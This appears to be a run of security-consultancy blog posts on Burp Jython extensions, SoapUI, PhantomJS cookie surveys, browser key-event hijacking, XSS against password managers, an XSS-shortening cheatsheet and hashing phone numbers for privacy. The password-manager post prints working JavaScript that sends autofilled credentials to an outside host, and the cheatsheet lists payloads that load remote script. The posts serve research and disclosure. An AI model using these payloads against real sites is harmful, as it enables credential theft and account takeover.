Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kind of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Event though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.ConfigureJython
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.
A request has been processed and modified by the extension. Since Burp doesn't currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension's tab.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes a an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

jython_interpreter

This shell was originally intended to work with the classes and objects defined jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

jython_shell1

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services . SoapUI Pro even includes a variety of web-service specific payloads for security testing.

SoapUI

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducability for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a "proper" WSDL or service description by telling SoapUI it's a REST service.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are a tons of tools out there, including official Burp examples, burpextensions.com, and findable on github. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes an API for JavaScript for command execution.  I was able to build on this script to build out a list of active and inactive URLs by checking the status callback from page.open and capture the cookies from every active URL as stored in page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.OnUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
# output JSON of cookies from page, one JSON string per line
# format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

Browser Event Hijacking

By: Ben Toews

TL;DR: preventDefault can be bad

In playing with the preventDefault method on JavaScript events, it occured to me that one can easily hijack events that should get passed through to the browser. The example that I will be discussing here is the ctrl+f or ⌘+f combination. This ubiquitous key combination results in a search box of some type being displayed to the user. With browser and OS key bindings, there is a user expectation of continuity. We are conditioned as users to expect that pressing these key combinations will have a certain effect. The interruption of this continuity can have security implications.

In the example hosted here, a list of information that a user might be tempted to search through is presented. JavaScript on the page hijacks the ctrl+f and ⌘+f combinations, presenting a search box that is nearly identical to the browser search box users would see running Google Chrome on OSX. While normally, JavaScript wouldn’t have access to the contents of the search box, the fake search box is obviously accessible to the malicious site.

Fake Browser Search Bar

Fake Browser Search Bar

Real Browser Search Bar (Google Chrome on OSX)

Real Browser Search Bar (Google Chrome on OSX)

The ability of a malicious site to interrupt the expected continuity of user interaction with a web browser constitutes a breach of user trust on the part of the web browser. Because the user trusts that this key combination will trigger a browser event, they will trust the search bar presented by the site and interact with it as they would with the browser. Other key combinations could be similarly attacked. For example, ctrl+s/⌘+s or ctrl+o/⌘+o could be hijacked and could display a fake dialog claiming that the user’s password is required for file-system access. Specific attack scenarios aside, it is problematic to have ambiguity about the boundaries between browser and web app. More generally, a lower trust component should not have the ability to affect the behavior of a higher trust component.

This page in probably won’t be convincing for users of different operating systems or browsers, but with a bit more effort, the script could detect browser and OS and display an appropriate search box. It could also easily emulate other browser behavior like highlighting entered text or scrolling around the page.

What is the solution, though? There are a few solutions that come to mind:

  1. Place the browser search box in a part of the browser that could not be confused with website content.
  2. Warn the user when a site attempts to call preventDefault on an event that is registered as a browser key binding.

I raised this issue to the Chrome team and it was labeled as a low-priority issue. I’m not sure that I disagree with that analysis, but I do think that this is an issue that should be considered.

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By reseting the password, the attacker is giving away his presence and the extent to which he is able to masquarade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly any attention is how these can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page aswell as a second page that is vulnerable to XSS (find them here). I then proceded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
</script>

All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert  box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. Eg. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!– XSS Injected here –>
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!– End XSS Injection –>

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value=’try typing in here’>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

Pass the iOS Privacy Salt – Hashing Does NOT Guarantee Privacy.

By Kate Pearce, Neohapsis & Neolabs

There has been a lot of concern and online chatter about iPhone/mobile applications and the private data that some send to various parties. Starting with the discovery of Path sending your entire address book to their servers, it has since also been revealed that other applications do the same thing. The other offenders include Facebook, Twitter, Instagram, Foursquare, Foodspotting, Yelp, and Gowalla. This corresponds nicely with some research I have been doing into device ID leakage on mobile devices, where I have seen the same leakages, excuses, and techniques applied and abused as those discussed around the address book leakages.

I have observed a few posts discussing the issues proposing solutions. These solutions range from requiring iOS to request permission for address book access (as it does for location) and advising developers to hash sensitive data that they send through and compare hashes server side.

The first idea is a very good one, I see few reasons a device geolocation is less sensitive than its address book. The second one as given by is only partial advice however, and if taken as it is given in Martin May’s post, or Matt Gemmel’s arguments;  it will not solve the privacy problems on its own. This is because 1. anonymised data isn’t anonymous, and 2. no matter what hashing algorithm you use, if the input material is sufficiently constrained you can compute, or precompute all possible values.

Martin May’s two characteristics of a hash [link] :

  • Identical inputs will yield the same hash
  • It is virtually impossible to deduce the original input from a hash if a strong hashing algorithm is used.

This is because, of these two characteristics of a hash the privacy implications of first are not fully discussed, and the second is incorrect as stated.

 Hashing will not solve the privacy concerns because:

  • Hashing Data does not Guarantee Privacy (When the same data is input)
  • Hashing Data does not Guarantee Secrecy (When the input values are constrained)

The reasons not discussed for this are centered on the fact that real world input is constrained, not infinite. Telephone numbers are an extreme case of this, as I will discuss later.

A quick primer on hashing

Hashing is a destructive, theoretically one-way process where some data is taken and put through an algorithm to produce some output that is a shadow of the input. Like a shadow, the same output is always produced by the same input, but not the other way around. (Same car, same shadow).

A very simple example of a hashing function is the modulus (or remainder). For instance the output from 3 mod 2 is the remainder when 3 is divided by 2, or 1. The percent sign is commonly used in programming languages to denote this operation, so similarly

                1 % 3 is 1,             2 % 3 is 2              3 % 3 is 0              4 % 3 is 1              5 % 3 is 2       etc

If you take some input, you get the same output every time from the same hashing function. The reason the hashing process is one way is because it intentionally discards some data about the original. This results in what are called collisions, and we can see some in our earlier example using mod 3, 1 and 4 give the same hash, as do 2 and 5. The example given will cause collisions approximately one time in 1, however modern strong hashing functions are a great deal more complex than modulo 3. Even the “very broken” MD5 has collisions occur only one time in every 2^24 or 1 in ~17 000 000.

A key point is that, with a hashing algorithm for any output there are theoretically an infinite number of inputs that can give it and thus it is a one-way, irreversible, process.

A second key point is that any input gives the same output every time. So, by checking if the hashes of two items are the same you can be pretty sure they are from the same source material.

Cooking Some Phone Number Hash(es)

(All calculations are approximate, if I’m not out by two orders of magnitude then…)

Phone numbers conform to a rather well known format, or set of formats. A modern GPU can run about 20 million hashes per second (2*10^7), or 1.7  trillion (1.7 *10 11) per day. So, how does this fit with possible phone numbers?

A pretty standard phone number is made up of 1-3 digits for a country code, 3 local code, and 7 numbers, with perhaps 4 for the extension.

So, we have the following range of numbers:

0000000000000-0000 to 9999999999999-0000

Or, 10^13 possible numbers… About 60 days work to compute all possible values (and a LOT of storage space…)

If we now represent it in a few other forms that may occur to programmers…

+001 (234) 567-8910, 0012345678910, 001-234-5678910, 0012345678910(US), 001(234)5678910

We have maybe 10-20 times that, or several year’s calculations…

But, real world phone numbers don’t fill all possible values. For instance, take a US phone number. It is also made up of the country code, 3 for the local code , and 7 numbers, with perhaps 4 for the extension. But:

  • The country code is known:
  • The area code is only about 35% used since only 350 values are in use
  • The 7 digit codes are not completely full (let’s guess 80%)
  • Most numbers do not use extensions (let’s say 5% use them

Now, we only have 350 * (10 000 000 *.8) * 1.05 or 2.94 billion combinations (2.94*10^9). That is only a little over two minutes on a modern GPU. Even allowing for different representations of numbers you could store that in a few of gigabytes of RAM for instant lookup, or recalculate every time and take longer. This is what is called a time space tradeoff, the space of the memory or the time to recalculate.

Anyway, the two takeaways for our discussion here regarding privacy are:

1. Every unique output value probably corresponds to a unique input value, so this hashing anonymisation still has privacy concerns.
Since possible phone numbers are significantly fewer than the collision chance of even a broken hashing algorithm there is probably little chance of collisions.

2. Phone numbers can be reverse computed from raw hashes alone
Because of the known constraints of input values It is possible to either brute force reverse values, or to build a reasonable sized rainbow table on a modern system.

Hashing Does NOT Guarantee Privacy

Anonymising data by removing specific user identifying information but leaving in unique identifiers does not work to assuage privacy concerns. This is because often clues are in the data, or in linkages between the data. AOL learned this the hard way when they released “anonymised” search data.

Furthermore, the network effect can reveal a lot about you, how many people you connect to, and how many they connect to can be a powerful identifier of you. Not to mention predict a lot of things like your career area and salary point (since more connections tends to mean richer).

For a good discussion of some of the privacy issues related to hashes see Matt Gemmell’s post, Hashing for Privacy in social apps.

Mobile apps also often send the device hardware identifier (which cannot be changed or removed) to servers and advertising networks. And I have also observed the hash of this (or the WiFi MAC address) sent through. This hardly helps accomplish anything, as anyone who knows the device ID can hash it and look for that, and anyone who knows the hash can look for it, just as with the phone numbers. This hash is equally unique to my device, and unable to be changed.

Hashing Does not equal Secrecy

As discussed under “cooking some hash(es)” it is possible to work back from a hash to the input since we know some of the constraints operating upon phone numbers. Furthermore, even if we are not sure exactly how you are hashing data then we can simply put test data in and look for known hashes of it. If I know what 123456789 hashes to and I see it in the output, then I know how your app is hashing phone numbers.

The Full Solution to Privacy and Secrecy: Salt

Both of these issues can be greatly helped by increasing the complexity of the input into the hash function. This can both remove the tendency for anonymised data to carry identical identifiers across instances, and also reduce the chance of it becoming feasible to reverse-calculate all possible values. Unfortunately there is no perfect solution to this if user-matching functionality comes first.

The correct solution as it should be used to store passwords, entry specific salting (for example with bcrypt),  is not feasible for a matching algorithm as it will only work for comparing hashed input to stored hashes, and it will not work for comparing stored hashes to stored hashes.

However, if you as a developer are determined to make a server side matching service for your users, then you need to apply a hybrid approach. This is not good practice for highly sensitive information, but it should retain the functionality needed for server side matching.

Your first privacy step is to make sure your hashes do not match those collected or used by anyone else, do this by adding some constant secret to them, a process called salting.

e.g., adding 9835476579080945368095468905486 to the start of every number before you hash

This will make all of your hashes different to those used by any other developer, but will still compare them properly. The same input will give the same output.

However, there is still a problem – If your secret salt is leaked or disclosed the reversing attacks outlined earlier become possible. To avoid this, increase the complexity of input by hashing more complex data. So, rather than just hashing the phone number, hash the name, email, and phone number together. This does introduce the problem of causing hashes to disagree if any part of the input differs by misspelling, typo’s etc…

The best way to protect your user’s data from disclosure, and your reputation from damage due to a privacy breach:

  • Don’t collect or send sensitive user data or hashes in the first place – using the security principle of least privilege.
  • Ask for access in a very obvious and unambiguous way – informed consent.

Hit me/us up on twitter ( @neohapsis or @secvalve) if you have any comments or discussion. (Especially if I made an error!)

[Update] Added author byline and clarified some wording.

Groundhog Day in the Application Security World

By Kate Pearce, a Security Consultant and Researcher at Neohapsis

Throughout the US on Groundhog Day, an inordinate amount of media attention will be given to small furry creatures and whether or not they emerge into bright sunlight or cloudy skies. In a tradition that may seem rather topsy-turvy to those not familiar with it, the story says that if the groundhog sees his shadow (indicating the sun is shining), he returns to his hole to sleep for six more weeks and avoid the winter weather that is to come.

Similarly, when a company comes into the world of security and begins to endure the glare of security testing, the shadow of what they find can be enough to send them back into hiding. However, with the right preparation and mindset, businesses can not only withstand the sight of insecurity, they can begin to make meaningful and incremental improvements to ensure that the next time they face the sun the shadow is far less intimidating.

Hundreds or thousands of issues – Why?

It is not uncommon for a Neohapsis consultant to find hundreds of potential issues to sort through when assessing a legacy application or website for the first time. This can be due to a number of reasons, but the most prominent are:

  1. Security tools that are paranoid/badly tuned/misunderstood
  2. Lack of developer security awareness
  3. Threats and technologies have evolved since the application was designed/deployed/developed

Security Tools that are Paranoid/Badly Tuned/Misunderstood

Security testing and auditing tools, by their nature, have to be flexible and able to work in most environments and at various levels of paranoia. Because of this, if they are not configured and interpreted with the specifics of your application in mind they will often find a large number of issues, of which the majority are noise that should be ignored until the more important issues are fixed. If you have a serious, unauthenticated, SQL injection that exposes plain-text credit card and payment details, you probably shouldn’t a moment’s thought stressing about whether your website allows 4 or 5 failed logins before locking an account.

Lack of Developer Security Awareness

Developers are human (at least in my experience!), and have all the usual foibles of humanity. They are affected by business pressures to release first and fix bugs later, with the result that security bugs may be de-prioritized down as “no-one will find that” and so “later” never comes. Developers also are often taught about security as an addition rather than a core concept. For instance, when I was learning programming, I was first taught to construct SQL strings and verbatim webpage output and only much later to use parameterized queries and HTML encoding. As a result, even though I know better, I sometimes find myself falling into bad practices that could introduce SQL injection or cross-site scripting, as the practices that introduce these threats come more naturally to me than the secure equivalents.

Threats and Technologies have Evolved Since the Application was Designed/Deployed/Developed

To make it even harder to manage security, many legacy applications are developed in old technologies which are either unaware of security issues, have no way of dealing with them, or both. For instance, while SQL injection has been known about for around 15 years, and cross-site scripting a little less than that, some are far more recent, such as clickjacking and CSS history stealing.

